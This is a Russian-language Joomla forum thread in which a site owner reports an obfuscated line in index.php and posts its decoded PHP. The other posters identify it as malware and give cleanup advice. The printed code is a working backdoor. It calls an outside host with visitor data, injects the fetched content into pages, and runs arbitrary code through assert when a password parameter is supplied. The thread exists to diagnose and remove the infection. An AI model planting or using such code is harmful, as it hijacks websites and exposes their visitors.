0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 3657 Просмотров
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Странный код в index.php
« : 14.05.2015, 09:09:55 »
Добрый день. Сегодня обнаружил, что в файле Index.php (Joomla 2.5) прописан код, который я раньше не замечал. $fil = 'ass';$fil .= 'ert';@$fil(str_rot13('riny(onfr64_qrpbqr("nJLtX............ и т.п. Сравнивал аналогичный файл с других сайтов - там такой строки нет. Подскажите, что это? Спасибо.
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Странный код в index.php
« Ответ #1 : 14.05.2015, 09:23:58 »
Похоже на вредоносный.
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Re: Странный код в index.php
« Ответ #2 : 14.05.2015, 09:44:49 »
Пытаюсь расшифровать. На одном сайте выдало вот что:

Код
<?php if (isset($ibv)) {
    echo $ibv;
} else {
    if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
    if (!isset($c_["HTTP_ACCEPT_CHARSET"])) {
        if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) {
            $c0 = "UTF-8";
        } else {
            $c0 = "windows-1251";
        }
    } else {
        $c0 = $c_["HTTP_ACCEPT_CHARSET"];
    }
    if (function_exists("curl_init")) {
        $c1 = curl_init("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
        curl_setopt($c1, 42, false);
        curl_setopt($c1, 19913, true);
        $ibv = curl_exec($c1);
        curl_close($c1);
    } elseif (ini_get("allow_url_fopen") == 1) {
        $ibv = file_get_contents("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
    }
    if (isset($ibv)) {
        echo $ibv;
    }
    if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "c79f0b3a") {
        @assert($_REQUEST["c"]);
    }
}
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Re: Странный код в index.php
« Ответ #3 : 14.05.2015, 11:08:56 »
Подскажите, пожалуйста, что означает этот код.
*

vegushka

  • Давно я тут
  • 523
  • 36 / 1
  • Мажьте лоб вазеленкой
Re: Странный код в index.php
« Ответ #4 : 14.05.2015, 11:40:27 »
Такой код картинками надо выкладывать. А код скорее всего берет страничку с сайта "o l d c o l o n y b e c k l e y" и вставляет в ваши страницы.
ненавижу icetheme, обожаю Rockettheme
Ваше спасибо - в репу, а лучше на Яндекс 41001140731879
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Странный код в index.php
« Ответ #5 : 14.05.2015, 11:49:58 »
Короче понятно, что сайт взломали.
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Re: Странный код в index.php
« Ответ #6 : 14.05.2015, 12:05:08 »
Посоветуйте, что сделать в первую очередь.
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Re: Странный код в index.php
« Ответ #7 : 14.05.2015, 12:06:41 »
Я этот код удалил из файла. Но, я думаю, этого мало. Как то он прописался в файле.
*

vegushka

  • Давно я тут
  • 523
  • 36 / 1
  • Мажьте лоб вазеленкой
Re: Странный код в index.php
« Ответ #8 : 14.05.2015, 12:12:54 »
полное сравнение файлов сайта с дистрибутивом Joomla той же версии. Это как избавиться... дальше уже защита сайта
ненавижу icetheme, обожаю Rockettheme
Ваше спасибо - в репу, а лучше на Яндекс 41001140731879
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Странный код в index.php
« Ответ #9 : 14.05.2015, 12:26:07 »
Посоветуйте, что сделать в первую очередь.

Если сайтов больше одного на хостинге убрать его от других. Проверить антивирусами, сканерами типа ai-bolit. Удалить вредоносный код, закрыть уязвимости, сменить пароли.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Странный код в index.php
« Ответ #10 : 14.05.2015, 12:58:10 »
Если сайтов больше одного на аккаунте, то имеет смыл лечить все, а то толку в работе не будет, либо разбивать все по аккаунтам и затем лечить!
*

mnogoto4ka

  • Захожу иногда
  • 138
  • 0 / 0
Re: Странный код в index.php
« Ответ #11 : 14.05.2015, 13:28:20 »
Спасибо большое за советы. Начинаю "лечить".
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 1959
Последний ответ 08.05.2021, 16:16:32
от gartes
Запретить смену прав на index.php - Joomla

Автор magrychev

Ответов: 5
Просмотров: 1729
Последний ответ 24.10.2017, 21:14:24
от winstrool
Странный файл появляется- php-mail.log

Автор Elimelech

Ответов: 22
Просмотров: 1809
Последний ответ 28.04.2017, 15:48:10
от Elimelech
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 1758
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 1482
Последний ответ 28.08.2016, 20:52:51
от flyingspook